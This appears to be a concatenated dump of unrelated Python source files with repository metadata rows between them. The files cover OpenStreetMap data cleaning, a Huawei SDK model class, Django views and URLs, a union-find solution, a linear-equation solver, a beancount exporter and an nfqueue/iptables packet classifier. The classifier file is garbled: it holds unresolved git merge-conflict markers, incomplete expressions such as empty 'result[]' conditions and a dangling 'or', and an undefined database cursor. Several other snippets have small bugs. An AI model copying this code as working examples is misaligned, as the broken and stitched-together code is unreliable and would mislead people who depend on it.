street_types = defaultdict(set)
for event, elem in ET.iterparse('./input/sample.osm', events=("start",)):
if elem.tag == 'node' or elem.tag == 'way':
for tag in elem.iter('tag'):
if is_street_name(tag):
audit_street_type(street_types, tag.attrib['v'])
osm_file.close()
def update_street(name, street_issue):
"""
Takes in street suffix and determines if it is an expected suffix.
If not, function checks whether suffix is an abbreviation issue (from mapping) and corrects it if true.
Also checks to make sure no lowercase issues.
"""
mapping = { "St": "Street",
"St.": "Street",
"Blvd": "Boulevard",
"Blvd.": "Boulevard",
"Ave": "Avenue",
"Ave.": "Avenue",
"Rd.": "Road",
"Rd" : "Road,",
"Dr" : "Drive",
"Dr.": "Drive",
"Trl": "Trail",
"Rd" : "Road",
"Ln" : "Lane",
"Cir": "Circle",
"Ct" : "Court",
"Hwy": "Highway",
"Trce": "Trace",
"Pkwy": "Parkway",
"Pl": "Place",
"Xing": "Crossing",
"Ter": "Terrace",
"Mhp": "Mobile Home Park",
"Crst": "Crest",
"Lndg": "Landing",
"Pt": "Point",
"S": "South",
"S.": "South",
"W": "West",
"W.": "West",
"N": "North",
"N.": "North",
"E": "East",
"E.": "East",
"NE": "Northeast",
"NW": "Northwest",
"SE": "Southeast",
"SW": "Southwest",
"Hts": "Heights",
"Rte": "Route"}
nn = street_type_re.search(name)
ll = lowercase_re.search(name)
cc = capitalize_re.search(name)
if nn:
street_type = nn.group()
if street_type not in expected:
if street_type in mapping:
name = re.sub(street_type_re, mapping[street_type], name)
elif ll or cc:
name = name.title()
return name
else:
street_issue[street_type] += 1
return name
return name
def update_phone(n):
""" Formatting phone numbers to ###-###-#### """
match = re.match(re.compile(r'\d{3}\-\d{3}\-\d{4}'),n)
if match is None:
n = re.sub('\+1', '', n)
n = re.sub(' ', '', n)
if "(" in n or ")" in n:
n = re.sub('[(]',"", n)
n = re.sub('[)]','-',n)
n = re.sub(' ', '', n)
if "+1" in n:
n = re.sub('\+1','',n)
if re.match(re.compile(r'\-\d{3}\-\d{3}\-\d{4}'),n) is not None:
n = n[1:]
if re.match(re.compile(r'\d{1}\-\d{3}\-\d{3}\-\d{4}'),n) is not None:
n = n[2:]
if re.match(re.compile(r'\d{9}'),n):
n = n[:3] + '-' + n[3:6] + '-' + n[6:]
if re.match(re.compile(r'\d{6}\-\d{4}'),n):
n = n[:3] + '-' + n[3:]
return n
def update_county(name):
"""
Using regex to determine whether particular string has more than one county (separated by : or ;).
If true, first county enlisted will be returned. If first county is from AL, we replace it with
'Fulton, GA'.
"""
if county_re.search(name):
if ":" in name:
name = name.split(':')[0]
elif ";" in name:
name = name.split(';')[0]
if "AL" in name:
name = "Fulton, GA"
print name
return name
def update_postal(name):
"""Return first five digits of postal code"""
if postal_re.search(name):
return name[:5]
return name
| [
"[email protected]"
] | |
8a7738f0d32537b2f0994883b51fa8ae1b0e8c30 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-hilens/huaweicloudsdkhilens/v3/model/delete_secret_response.py | aa4df97a980ce2ea5cf944f3cadf638e76878e29 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,211 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeleteSecretResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'secret': 'SecretId'
}
attribute_map = {
'secret': 'secret'
}
def __init__(self, secret=None):
"""DeleteSecretResponse
The model defined in huaweicloud sdk
:param secret:
:type secret: :class:`huaweicloudsdkhilens.v3.SecretId`
"""
super(DeleteSecretResponse, self).__init__()
self._secret = None
self.discriminator = None
if secret is not None:
self.secret = secret
@property
def secret(self):
"""Gets the secret of this DeleteSecretResponse.
:return: The secret of this DeleteSecretResponse.
:rtype: :class:`huaweicloudsdkhilens.v3.SecretId`
"""
return self._secret
@secret.setter
def secret(self, secret):
"""Sets the secret of this DeleteSecretResponse.
:param secret: The secret of this DeleteSecretResponse.
:type secret: :class:`huaweicloudsdkhilens.v3.SecretId`
"""
self._secret = secret
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeleteSecretResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
8503376b74b2a923b8e2a3000559857a39e7f56c | f79ad09628384296750132040c008c8c6f3a24b2 | /Kotomi/Kotomi/blog/views.py | 39d9303308c92fed4a6517015a321d8a465ce0e9 | [
"Apache-2.0"
] | permissive | 1tuanyu/Django | 4cd671ab2cb0cc7394431f470a29f6061388e9f4 | 466b4b4b1a5b3b81c3315fd26e8dfa8ddad7d272 | refs/heads/master | 2021-01-24T21:12:35.910075 | 2018-03-29T12:21:44 | 2018-03-29T12:21:44 | 123,267,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,201 | py | from django.shortcuts import render
from blog.models import Article
# Create your views here.
def Home(request):
articles = Article.objects.all()
return render(request, 'home.html', {'articles':articles})
def Post(request):
return render(request, 'post.html')
def Post_success(request):
if request.POST:
articles = request.POST['new_title']
return render(request, 'post_success.html',{'articles':articles} )
else:
return render(request, 'error.html')
"""
, new_title, new_label, new_content
titles = [article.title for article in Article.objects.all()]
new_title = request.POST['new_title']
if new_title in titles:
return render(request, 'error.html', {'error_message':'This article is already exist!'})
else:
new_article = Article(title=new_title, pub_date=timezone.now(), label=new_label, content=new_content)
new_article.save()
def Post_success(request):
if request.POST['new_content']:
post_success = request.POST['new_content']
return render(request, 'error.html')
else:
return render(reuqest, 'error.html')
"""
| [
"[email protected]"
] | |
3a51ca22b295a333d9652b5110a5ba537c2e0b23 | ff1bc2cf1cd042201df0a11da62b38725af55bfb | /setup.py | 1d2392e1304ab5e3c0320a0aff81a1543c3e8308 | [
"MIT"
] | permissive | darkbarker/pybarker | a425181149d79436c92b4ded6e3dbfc3b5934c32 | e04c79cab6ca6005761391f0bd267b8e69aed7ea | refs/heads/master | 2023-08-20T19:19:57.424908 | 2023-08-14T20:11:03 | 2023-08-14T20:11:03 | 190,403,537 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | from setuptools import setup, find_packages
from os.path import join, dirname
import pybarker
setup(
name="pybarker",
version=pybarker.__version__,
packages=find_packages(exclude=["tests"]),
include_package_data=True,
long_description=open(join(dirname(__file__), "README.md")).read(),
install_requires=["unidecode"],
)
| [
"[email protected]"
] | |
f0726feaad28d68f162f4eb3e242c62833307ecb | cdb186ad49bba1406c81f634b936e73f8cb04009 | /ABC/120/d2.py | 59601ef036cf61ce1bab54e68b795dbf3a972c45 | [] | no_license | ToshikiShimizu/AtCoder | 9e46f5581f2c1f5149ce1394d61d652cda6256a3 | 41fe6408c20c59bbf1b5d7ee9db2e132f48ad1ac | refs/heads/master | 2023-07-26T22:45:51.965088 | 2023-07-10T14:11:35 | 2023-07-10T14:11:35 | 148,154,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,617 | py | class UnionFind:
def __init__(self, n):
self.nodes = n
self.parents = [i for i in range(n)]
self.sizes = [1] * n
self.rank = [0] * n
def find(self, i): # どの集合に属しているか(根ノードの番号)
if self.parents[i] == i:
return i
else:
self.parents[i] = self.find(self.parents[i]) # 経路圧縮
return self.parents[i]
def unite(self, i, j): # 二つの集合を併合
pi = self.find(i)
pj = self.find(j)
if pi != pj:
if self.rank[pi] < self.rank[pj]:
self.sizes[pj] += self.sizes[pi]
self.parents[pi] = pj
else:
self.sizes[pi] += self.sizes[pj]
self.parents[pj] = pi
if self.rank[pi] == self.rank[pj]:
self.rank[pi] += 1
def same(self, i, j): # 同じ集合に属するかを判定
return self.find(i)==self.find(j)
def get_parents(self): # 根ノードの一覧を取得
for n in range(self.nodes): # findで経路圧縮する
self.find(n)
return self.parents
def size(self, i):
p = self.find(i)
return self.sizes[p]
N, M = map(int, input().split())
AB = []
B = []
for m in range(M):
a, b = map(int, input().split())
AB.append((a-1,b-1))
ans = []
score = N * (N-1) // 2
uf = UnionFind(N)
for a, b in AB[::-1]:
ans.append(score)
if not uf.same(a,b):
score -= uf.size(a) * uf.size(b)
uf.unite(a,b)
for score in ans[::-1]:
print(score)
| [
"[email protected]"
] | |
4f82550e771ed9f4ab7424687d1833c1afbf8e2e | 7e61a8a6724ab1f6fe2cf8ec896faa7c9c56866a | /precision_tool/lib/pt_dump.py | 155bd8c516519a714a4df3690457ba38c94b0d71 | [
"Apache-2.0"
] | permissive | BruceDai003/tools | 66f91972c2deb547bbeb8220735647efcb224a90 | 332f112457e61b235e7cc4bc1e156dbe14456c3c | refs/heads/master | 2023-08-22T23:34:51.359807 | 2021-10-29T01:58:56 | 2021-10-29T01:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | # coding=utf-8
import os
import re
import time
import sys
from lib.util import util
from lib.constant import Constant
import config as cfg
from lib.precision_tool_exception import catch_tool_exception
from lib.precision_tool_exception import PrecisionToolException
class PTDump(object):
def __init__(self):
self.log = util.get_log()
# self.h5_util =
def prepare(self):
print("test") | [
"derek@derek-HP-EliteBook-840-G5"
] | derek@derek-HP-EliteBook-840-G5 |
5f85a771ec230122fb965c210478c90c309f52ed | 5d392d98549b0e0968510c9f23cc0ea3319d7e8a | /webapp/handlers/councilMemberHandler.py | c1b7560dce26c997c0abfe18513be0e83c8cddad | [] | no_license | jimclouse/MosaicRx | 27b9fc510cc146e2b7a56500da31f67fb79649c4 | c4165494a801f7c0ae045e0cef6ab6ac3c20c6df | refs/heads/master | 2020-12-24T15:14:33.109075 | 2014-12-04T16:07:13 | 2014-12-04T16:07:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | #! python
import tornado.web
from partyHandler import PartyHandler
from webservice import graphService
class CouncilMemberHandler(PartyHandler):
@tornado.web.asynchronous
def get(self, councilMemberId):
partyId = graphService.getPartyId('cm', councilMemberId)
PartyHandler.get(self, partyId) | [
"[email protected]"
] | |
fe4b088965733c8cd6566d2b0f2c4b92ba22e423 | 1aa0ec8b98e66adc191627a3fbbed3aa28c67da9 | /app/reduce-count-quarter-q2/route.py | 60423bf257de638f27f06d90be8ee1d7154423af | [] | no_license | sfenman/openfass-new-york-taxi | bd51a32cd5ca84516f63163cc310a4a8fbe26b54 | e517328371a586a475c11c452e3af4f5b5dd4b06 | refs/heads/master | 2023-03-14T21:43:18.496034 | 2021-03-26T23:25:11 | 2021-03-26T23:25:11 | 345,122,872 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | class Route:
def __init__(self, route_id, vendor_id, pickup_datetime, drop_off_datetime,
passenger_count, pickup_longitude, pickup_latitude,
drop_off_longitude, drop_off_latitude, store_and_fwd_flag):
self.route_id = route_id
self.vendor_id = vendor_id
self.pickup_datetime = pickup_datetime
self.drop_off_datetime = drop_off_datetime
self.passenger_count = passenger_count
self.pickup_longitude = pickup_longitude
self.pickup_latitude = pickup_latitude
self.drop_off_longitude = drop_off_longitude
self.drop_off_latitude = drop_off_latitude
self.store_and_fwd_flag = store_and_fwd_flag
def __eq__(self, o: object) -> bool:
return self.__class__ == o.__class__ and self.route_id == o.route_id
def __ne__(self, o: object) -> bool:
return self.__class__ != o.__class__ or self.route_id != o.route_id
def __hash__(self) -> int:
return hash(self.route_id)
def __str__(self) -> str:
return 'route id: ' + str(self.route_id)
| [
"[email protected]"
] | |
54a7dd065083236b7cf6bdf9d3d0e9405dab0f29 | 1c3f4acfdedd139ee7b05093fd26a8becc6c1cd8 | /CURSO DE PYTHON 3/Mundo 1 - Fundamentos/3 - Usando módulos do Python/Exerc017.py | d9df3c45b9e8f8ac53ec6e58a3f12109a224efb4 | [] | no_license | thiagosousadasilva/Curso-em-Video | 7d358384e03b9289bf62c90d2268e0654fbae9a7 | 2419797fcd688dcb78ca110ed18e06daec3bbcc4 | refs/heads/master | 2023-03-01T06:21:35.855862 | 2021-01-27T11:50:37 | 2021-01-27T11:50:37 | 258,023,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | # Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um
# triângulo retângulo. Calcule e mostre o comprimento da hipotenusa.
# h² = Co² + Ca² - ou usar pronto no modúlo math
import math
print("=========== desafio 017 ============")
CatOp = float(input('Informe o comprimento do cateto oposto: '))
CatAd = float(input('informe o comprimento do cateto adjacente: '))
Hip = math.hypot(CatOp, CatAd)
print('A hipotenusa é {}'.format(Hip)) | [
"[email protected]"
] | |
5a1bb3ebb5d23d720a4240471f0ea019787bdee9 | 984a797d9f81dd8d60a4d9f0861d1e8a88581026 | /PY/Week 3/CLASS/fibonacci.py | ab556c0f9174deb2b4cba1bba532f80617811d1a | [] | no_license | Yazurai/ELTE-IK-19-20 | 69e6c39b609886cce66155aaaadd0aaeb0415440 | 46fe1699885577d7fd7ffe06b3969ef34dd7e6d5 | refs/heads/master | 2020-07-23T02:19:08.724761 | 2019-12-17T10:23:10 | 2019-12-17T10:23:10 | 207,415,313 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | def fibonacci(n):
fibList = [1,1]
for i in range(2, n, 1):
fibList.append(fibList[i-2] + fibList[i-1])
return fibList
| [
"[email protected]"
] | |
f4be12af244d26d05589402a082c127df231e385 | f9549f2657202068d331d81b519a51ed7c3f3776 | /0x06-python-classes/6-square.py | 44b00c18e9ba0d4007b99e94d994b9a4f2d74312 | [] | no_license | BardoftheOzarks/holbertonschool-higher_level_programming | 0e54774bd2581137cb58e116ac7e2985967ccd60 | 191484674583d084b15129a38788e82d4869c555 | refs/heads/master | 2023-04-20T01:01:50.221645 | 2021-05-13T21:20:32 | 2021-05-13T21:20:32 | 291,762,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | #!/usr/bin/python3
'''Creates a class with two attributes'''
class Square:
'''A class with two private instance attributes'''
def __init__(self, size=0, position=(0, 0)):
if type(size) is not int:
raise TypeError('size must be an integer')
if size < 0:
raise ValueError('size must be >= 0')
if type(position) is not tuple or len(position) is not 2\
or type(position[0]) is not int or type(position[1]) is not int\
or position[0] < 0 or position[1] < 0:
raise TypeError('position must be a tuple of 2 positive integers')
self.__size = size
self.__position = position
@property
def position(self):
return self.__position
@property
def size(self):
return self.__size
def area(self):
return self.__size**2
def my_print(self):
if self.__size is 0:
print()
else:
for o in range(self.__position[1]):
print()
for i in range(self.__size):
for spaces in range(self.__position[0]):
print(' ', end='')
for hashes in range(self.__size):
print('#', end='')
print()
@size.setter
def size(self, value):
if type(value) is not int:
raise TypeError('size must be an integer')
if value < 0:
raise ValueError('size must be >= 0')
self.__size = value
@position.setter
def position(self, value):
if type(value) is not tuple or len(value) is not 2\
or type(value[0]) is not int or type(value[1]) is not int\
or value[0] < 0 or value[1] < 0:
raise TypeError('position must be a tuple of 2 positive integers')
self.__position = value
| [
"[email protected]"
] | |
b6c4e6243f7aed9aeb62bb560838ff5c8daa92fe | 94b9589d8eb357f784f425051ffb10aa6d2104fa | /lib/doconce/__init__.p.py | cb305805b347a221aa72ac2fccf05f1fe1447c5c | [
"BSD-3-Clause"
] | permissive | sjsrey/doconce | 29607366756a3f48568a128a88c9bb5d65dc3d9d | 7bd32f8b0c99ad6f1173df0c8e058ea1bd400e28 | refs/heads/master | 2021-01-15T17:55:48.436706 | 2015-08-25T09:30:19 | 2015-08-25T09:30:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | '''
# #include "docstrings/docstring.dst.txt"
'''
__version__ = '1.0.3'
version = __version__
__author__ = 'Hans Petter Langtangen', 'Johannes H. Ring'
author = __author__
__acknowledgments__ = ''
from doconce import doconce_format, DocOnceSyntaxError
| [
"[email protected]"
] | |
5c1ae67adb38e75d56a6b033979191ccaf1b9c4c | 06a26410235304ca3061f2abf861ceef3eef6c22 | /tools/BUILD | 8ca73d1470ef71b2fb4ba46f3bc7997dcc8e7d46 | [
"Apache-2.0"
] | permissive | mjbots/rules_mbed | d36354388661f5b1eaed3b88daf3fe201d4ab29c | 4a7094b9082625de3b979eae7f5df705cf110695 | refs/heads/master | 2023-01-13T21:56:15.464329 | 2023-01-09T12:47:59 | 2023-01-09T12:47:59 | 157,472,176 | 21 | 6 | null | null | null | null | UTF-8 | Python | false | false | 830 | # -*- python -*-
# Copyright 2018 Josh Pieper, [email protected].
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
package(default_visibility = ["//visibility:public"])
environment(name = "k8")
environment(name = "stm32f4")
environment_group(
name = "cpus",
environments = [":k8", ":stm32f4"],
defaults = [":stm32f4"],
)
| [
"[email protected]"
] | ||
5f102bdaa532902c1a9f811afa1e6ef43103f512 | 9381f6e3c6e13295467726ced5e6e4a8b3dedc45 | /api/follow.py | 575b6114cb170c195dfd90306b6d089122052f2d | [] | no_license | ayushi0407/twitterback | 7043a8053c7eca5807e081413369935420943b39 | 566dff5d068a86ae556b59b7e101178cc38a9d2c | refs/heads/master | 2022-12-16T11:40:46.470416 | 2020-09-12T10:10:19 | 2020-09-12T10:10:19 | 294,917,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,271 | py | from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from rest_framework import permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate,logout
from rest_framework.authtoken.models import Token
import json
from datetime import datetime
from django.utils import timezone
from .models import *
import math
import random
import pytz
import requests
import re
from django.forms.models import model_to_dict
from django.views import View
from django.views.decorators.csrf import csrf_exempt
import os
from django.contrib.auth import get_user_model
User = get_user_model()
class follow(APIView):
@csrf_exempt
def dispatch(self, request, *args, **kwargs):
return super(follow, self).dispatch(request, *args, **kwargs)
# @permission_classes((IsAuthenticated, ))
def post(self, request):
user_by = ""
user_to = ""
check_user_to = ""
check_user_by = ""
try:
b = request.body
body_json = json.loads(b)
user_by = body_json['user_by']
user_to = body_json['user_to']
except Exception as ex:
return JsonResponse({'status':'fail','message':'Something went wrong'})
try:
check_user_to = AuthUser.objects.get(email=user_to).id
check_user_by = AuthUser.objects.get(email=user_by).id
check_follow = Follower.objects.filter(user_to=check_user_to ,user_by=check_user_by).exists()
if check_follow:
Follower.objects.filter(user_to=check_user_to ,user_by=check_user_by).delete()
return JsonResponse({'status':'success','message':'Unfollowed'})
else:
Follower.objects.create(user_to=check_user_to ,user_by=check_user_by)
return JsonResponse({'status':'success','message':'followed'})
except Exception as ex:
return JsonResponse({'status':'fail','message':'Something went wrong'})
| [
"[email protected]"
] | |
2b839ebabd98bcd1a390bd0a54812a9f5ccb336c | 3e6eecee5db3eedf395111a2abfe96bc3593fccd | /main.py | 965d940990f142146dfcb4e4ca3cdf8a398b7628 | [] | no_license | cassiostp/gauss_jacobi_seidel | 07c1d84f0f4e77ec6bc793a85e20944b76cb416c | 433277d47d81374e89a94884c0625cb58a339cbd | refs/heads/master | 2021-01-17T17:44:50.210833 | 2016-07-10T23:36:40 | 2016-07-10T23:36:40 | 63,022,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 824 | py | import gauss_jacobi_seidel as gj
import matriz_inversa as mi
print("valor de n:")
n = int(input().strip())
A = []
b = []
for i in range(n):
print("digite os elementos da linha", i+1, "da matriz A separados por espaço")
A.append([int(i) for i in input().strip().split()])
print("digite os elementos de b separados por espaço")
b += [int(i) for i in input().strip().split()]
print("digite o valor da precisão")
e = float(input().strip())
inv = mi.inversa(A)
d = []
soma = 0
print("\n\n Matriz Inversa")
for i in range(len(inv)):
print(inv[i])
for i in range(len(inv[0])):
for j in range(len(inv)):
soma += inv[i][j] * b[j]
d.append(soma)
soma = 0
print("\nd = A^(-1) * b => d =", d)
print("\nGauss-Jacobi", gj.gauss_jacobi(A, b, n, e))
print("\nGauss-Seidel", gj.gauss_seidel(A, b, n, e))
| [
"[email protected]"
] | |
858f100f30a77b9896b990ff08eca4a6d9244282 | f3cc5ee09c357fa9731dd4e3e4d575dfce02d97c | /sandboxsite/restapp/urls.py | 37153599f2606e83db9dfe7dd0bab930e04ae639 | [] | no_license | luafran/django_sandbox | 458c2d520417e07a849da6b2988dd0521a208cc6 | b114adb11ad402bfcfcb6d4bec204b456b6bac20 | refs/heads/master | 2020-05-15T16:50:59.451052 | 2013-10-02T22:26:58 | 2013-10-02T22:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,025 | py | from django.conf.urls import patterns, url
from django.conf.urls import include
from rest_framework.urlpatterns import format_suffix_patterns
from restapp import views
urlpatterns = patterns('',
url(r'^$', views.api_root),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^users/?$', views.UserList.as_view(), name='user-list'),
url(r'^users/(?P<pk>[0-9]+)/?$', views.UserDetail.as_view(), name='user-detail'),
url(r'^stores/?$', views.StoreList.as_view(), name='store-list'),
url(r'^stores/(?P<pk>[0-9a-fA-F]+)/?$', views.StoreDetail.as_view(), name='store-detail'),
url(r'^products/?$', views.ProductList.as_view(), name='product-list'),
url(r'^products/(?P<pk>[0-9]+)/?$', views.ProductDetail.as_view(), name='product-detail'),
url(r'^checkins/?$', views.CheckinList.as_view(), name='checkin-list'),
url(r'^checkins/(?P<pk>[0-9]+)/?$', views.CheckinDetail.as_view(), name='checkin-detail'),
)
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"[email protected]"
] | |
2f79fe00c71069bbe2135128f1342bdedca5b0c0 | ff76c7227c0fc0f0c691bc0592d6d5f67afd2d5e | /Classifier.py | 5a127b22d41b6402c02216dd4d6b799407b1b1cd | [] | no_license | HaTiMuX/SFC-Routing | 5bbd97aadc81b6983ddaef995f87502602a83067 | 6cb5157f72aad530b2b5b18dd3ea1b0d443f41d1 | refs/heads/master | 2016-09-06T01:17:31.449316 | 2014-07-02T09:05:40 | 2014-07-02T09:05:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,494 | py | #@Author=HaTiM#
#@Title=Classifier#
#@Function=MARK PACKETS DEPENDING ON SPECIFIC RULES#
import nfqueue, socket
from scapy.all import *
import os
<<<<<<< HEAD
os.system('iptables -A PREROUTING -j NFQUEUE --queue-num 0')
def conversion(N):
b = []
div = [10000, 1000, 100, 10, 1]
i=0
for d in div:
if N/d==1:
b[i]=1
else:
b[i]=1
i+=1
return b
=======
os.system('iptables -A OUTPUT -j NFQUEUE --queue-num 0')
>>>>>>> 85dd5e78a042515bef00c2b20e8f220e18e52afb
def cb(payload):
data = payload.get_data()
p = IP(data)
<<<<<<< HEAD
proto = p[IP].proto
src = p[IP].src
dst = p[IP].dst
try:
sql = "SELECT * FROM ClassRules WHERE ParNum<=3"
cursor.execute(sql)
results = cursor.fetchall()
for result in results:
if result[]==5:
if src==result[2] and dst==result[3] and proto==result[4] and sport==result[5] and dport==result[6]:
p.tos= result[1]
break
if result[]==4:
if src==result[2] and dst==result[3] and proto==result[4] and sport==result[5] and dport==result[6]:
p.tos= result[1]
break
if result[7]>3:
if src==result[1] and dst==result[2] and proto==result[2]:
p.tos= result[0]
break
elif result[]==2:
if((src==result[1] and dst==result[2]) or (src==result[1] and proto==result[3]) or (dst==result[2] and proto==result[3])):
p.tos= result[0]
break
elif result[]==1:
if(src==result[1] or dst==result[2] or proto==result[3]):
p.tos= result[0]
break
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
print "Matching rule: "
except:
print "Error reading rules"
elif (TCP in IP) or (UDP in IP):
dport = p[1].dport
sport = p[1].sport
try:
sql = "SELECT * FROM ClassRules"
cursor.execute(sql)
results = cursor.fetchall()
cond1 = (src==result[1] and dst==result[2] and proto==result[3] and sport==result[4]) or
cond2 = (src==result[1] and dst==result[2] and proto==result[3] and dport==result[5])
for result in results:
if result[]==5:
elif result[]==4:
if((src==result[1] and dst==result[2]) or (src==result[1] and proto==result[3]) or (dst==result[2] and proto==result[3])):
p.tos= result[0]
break
elif result[]==1:
if(src==result[1] or dst==result[2] or proto==result[3]):
p.tos= result[0]
break
=======
src = p[IP].src
try:
port = p[1].dport
try:
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP='%s' and port='%d'" % (src, port)
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
try:
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP is NULL and port='%d'" % (port)
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
try:
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP='%s' and port is NULL" % (src)
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
print("Packet Accepted: logical routing")
payload.set_verdict(nfqueue.NF_ACCEPT)
except:
print "Error looking for mark (by IP)"
except:
print "Error looking for mark (by port)"
except:
print "Error looking for mark (by IP and port)"
except:
print "Protocol does not support destination port field"
sql = "SELECT SF_MAP_INDEX FROM Rules WHERE IP='%s' and port is NULL" % (src)
try:
cursor.execute(sql)
result = cursor.fetchone()
if result is not None:
p.tos = result[0]
del p[IP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
else:
print("Packet Accepted: logical routing")
payload.set_verdict(nfqueue.NF_ACCEPT)
except:
print "Error looking for mark (by IP)"
>>>>>>> 85dd5e78a042515bef00c2b20e8f220e18e52afb
q = nfqueue.queue()
q.open()
q.unbind(socket.AF_INET)
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0) #Same queue number of the rule
#q.set_queue_maxlen(50000)
try:
q.try_run()
except KeyboardInterrupt, e:
os.system('iptables -F')
print "interruption"
q.unbind(socket.AF_INET)
q.close()
| [
"[email protected]"
] | |
6c6f33f15b63b5e19d285baad83f87e0e8d5507d | eda4a1f746555c9cefa7020f94cd6cc2e73a5588 | /beancount2gnucash.py | c4b738ae4438024152a3fa948ec29188f4c8f64c | [
"MIT"
] | permissive | juniorkrvl/beancount2gnucash | f03d6ff4f5ee1b5f37fd8f7da1d80b6b8423ae86 | 3e647e3e53429fd1e95a750601dbac1534d1dac2 | refs/heads/master | 2023-03-15T09:39:40.007648 | 2018-12-23T23:15:39 | 2018-12-23T23:15:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,127 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import os.path
import csv
from collections import defaultdict, OrderedDict
from difflib import get_close_matches
from beancount import loader, core
LEDGER_FILENAME = "ledger_filename"
GNUCASH_ACC_TYPES = {"BANK", "CASH", "ASSET",
"CREDIT", "LIABILITY", "STOCK", "MUTUAL",
"INCOME", "EXPENSE", "EQUITY",
"RECEIVABLE", "PAYABLE", "TRADING"}
ACC_HEADERS = OrderedDict(
[("type", "type"), ("full_name", "full_name"), ("name", "name"), ("code", "code"),
("description", "description"), ("color", "color"), ("notes", "notes"),
("commoditym", "commoditym"), ("commodityn", "commodityn"),
("hidden", "hidden"), ("tax", "tax"), ("place_holder", "place_holder")])
def main(ledger_filename):
head, tail = os.path.split(ledger_filename)
basename = os.path.splitext(tail)[0]
entries, errors, options = loader.load_file(ledger_filename)
export_accounts([entry for entry in entries if isinstance(
entry, core.data.Open)], head, basename)
def export_accounts(accounts, directory, basename):
def create_row(full_name, name, type, commoditym, place_holder):
row = defaultdict(lambda: "")
row[ACC_HEADERS["full_name"]] = full_name
row[ACC_HEADERS["name"]] = name
row[ACC_HEADERS["type"]] = type
row[ACC_HEADERS["commoditym"]] = commoditym
row[ACC_HEADERS["commodityn"]] = "CURRENCY"
row[ACC_HEADERS["hidden"]] = "F"
row[ACC_HEADERS["tax"]] = "F"
row[ACC_HEADERS["place_holder"]] = place_holder
return row
rows = []
for account in accounts:
currency = account.currencies[0]
parent = account.account.split(":")
while len(parent) > 0:
